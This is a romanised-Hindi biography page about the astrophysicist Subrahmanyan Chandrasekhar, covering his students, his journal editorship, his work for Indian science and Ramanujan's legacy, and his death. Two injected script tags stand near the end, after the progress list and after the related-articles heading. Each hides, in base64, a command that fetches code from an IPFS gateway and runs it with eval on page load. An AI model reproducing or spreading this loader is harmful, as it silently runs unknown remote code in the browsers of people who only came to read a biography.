doosaroan mean parishram ke lie utsah utpann karane ki chandrashekhar mean vilakshan yogyata thi. unake margadarshan me 50 se zyada vidyarthiyoan ne Ph.D. kary kiya. apane vidyarthiyoan ke sath unake sanbandh hamean purane zamane ki 'guru shishy' paranpara ki yad dilate hai. vidyarthiyoan se vah adar prapt karate the lekin vah unhean utsahit bhi karate the ki ve apane drishtikon nirbhik ho kar rakhean. unhoanne kaha - 'mere vidyarthi, aise vidyarthi jinake sath maianne nikat se kam kiya hai, ve ek prakar se shrriddhalu hai jo purane jamane ki yad dilate hai jinhean ham pustakoan mean padhate haian. isake sath hi jo maian kahata hooan usase ve bilkul bhayabhit nahian hote. unaki pratikriya sakaratmak hogi ya nakaratmak, ve charcha karate haian aur tark vitark bhi karate haian. jo ap kahate haian yadi koee vyakti usase poori tarah sahamat hota hai to vichar - vimarsh ka koee bindu nahian hoti.' apane samagr jivan mean yuva logoan ke sath unhoanne parichay banae rakha. ek bar unhoanne kaha - 'maian asani se kalpana kar sakata hooan ki yadi maianne 'pharmi' ya 'v aaun nyooman' ke sath kam nahian kiya to kuchh bhi nahian khoya, lekin apane vidyarthiyoan ke bare mean maian vaisi bat nahian kar sakata.'

patrikaoan ka sampadan

vah 1952 se 1971 tak 'khagol-bhautiki patrika' ke prabandh sampadak rahe. 'shikago vishvavidyalay' ki ek niji patrika ko unhoanne 'amerikan estronamikal sosaiti' ki ek rashtriy patrika ke roop mean parivartit kar diya. pahale barah varshoan tak patrika ki prabandh - vyavastha chandrashekhar aur ek aanshakalik sachiv ke hath mean thi. 'ham milajul kar sare kam karate the. hamane vaijnanik patrachar par dhyan diya. ham bajat, vijnapan aur prishth prabhar taiyar karate the. ham ri - priant ardar dete the aur bil bhejate the.' jab chandrashekhar sampadak bane to patrika varsh me chhah bar nikalati thi aur kul prishth sankhya 950 thi lekin chandrashekhar ke sampadakatv ki samapti ke samay patrika 'varsh mean chaubis bar' prakashit hoti thi aur kul prishth sankhya 12,000 thi. unake netritv mean patrika shikago vishvavidyalay se vittiy roop se svatantr ho gee. unhoanne patrika ke lie apane pichhe '500,000 yoo es d aaular' ki arakshit nidhi chhodi.

samarpit bharatiy

chandrashekhar ne mukhyatah videsh mean aur vahian kam kiya. 1953 mean vah amariki nagarik ban gaye. tathapi bharat ki behatari ki unhean gahari chinta thi. bharat mean bahut se vijnan sansthanoan aur javan vaijnanikoan ke sath unaka gahara sanbandh tha. apane bachapan mean unhean ramanujam ke vijnan ke prati sampoorn samaparn ke udaharan se prerana mili thi. ramanujam mean usaki dilachaspi jivan bhar bani rahi. 1940 ke uttarardh mean madras mean 'ramanujam ianstichyoot aauph maithimaitiks' sthapit karane mean sahayak ki bhoomika ada ki aur jab ianstichyoot ko arthik sankat ka samana karana p da to unhoanne is mamale ko neharoo ji ke samane rakha. ramanujam ki vidhava jo garibi ki halat mean rah rahi thian, unake lie peanshan rashi mean vriddhi karane ki vyavastha ki. 'richard aske' dvara ramanujam ki ardhapratimaean dhalavane ke lie bhi vah uttaradayi the.

vijnan ki khoj mean lage rahane mean chandrashekhar ke lie kya prerana thi ? usake ek vidyarthi 'yoovooz nootakoo' ne kaha - 'har samay sikhate hue 'chandr sansthapan' ke bare mean tanik bhi chinta nahian karate the. jo kuchh unhoanne kiya vah isalie kiya kyoanki vah upajaoo tarike se jijnasu the. unhoanne keval ek karan se hi yah kiya - isase unhean shaanti aur antarik shanti milati thi.'

jo vijnan ki khoj mean lage haian ya aisa karane ki yojana bana rahe haian unake lie ham chandrashekhar ko uddhrit karate hue kah sakate haian - 'vijnan ki khoj ki tulana kee bar parvatoan ooanche lekin zyada ooanchean nahian, ke arohan ke sath ki gee hai, lekin hamamean se kaun asha, ya kalpana hi, kar sakata hai ki asim tak phaili evarest par chadhaee kare aur usake shirsh par pahuanche jab ki akash nila ho aur hava rooki huee ho aur hava ki stabdhata mean barf ke saphe़d chamakilepan mean samast himalay ghati ka sarvekshan kare. hamamean se koee apane ird gird vishv aur prakriti ke tulanatmak drishti ke lie asha nahian kar sakata. lekin niche ghati mean kh de hona aur kanchanajanga ke oopar sooryoday hone ki pratiksha karane mean kuchh bhi buraee ya hinata nahian hai.'

poorv rashtrapati kalam apani kitab ‘viangs aauph phayar’ mean yad karate haian ki kis tarah pro. subrahmanyam chandrashekhar ne kaimbrij mean grejueshan ke dauran 1930 mean hi ‘chandrashekhar limit’ ki khoj kar li thi lekin nobel puraskar hasil kar manyata milane ke lie unhean 50 sal iantazar karana p da.

nidhan

chandrashekhar ka nidhan 21 agast, 1995 ko hua.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani

  1. Subrahmanyan Chandrasekhar, Kameshwar C. Wali, Current Science pp. 477-479, 1998;
  2. Chandrasekhar and His Limit by G. Venkataraman, Universities Press, 1992;
  3. Truth and Beauty : Aesthetics and Motivation in science by S. Chandrasekhar, University of Chicago Press, 1987;
  4. Chandra : A Biography of S. Chandrasekhar by Kameshwar C. Wali, Penguin Books, 1990;
  5. Eddington : The Most Distinguished Astrophysicist of His Time by S. Chandrasekhar, Cambridge University Press, 1983;
  6. Resonance (a journal of science education published by the Indian Academy of Science, Bangalore) April 1997 Issue.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>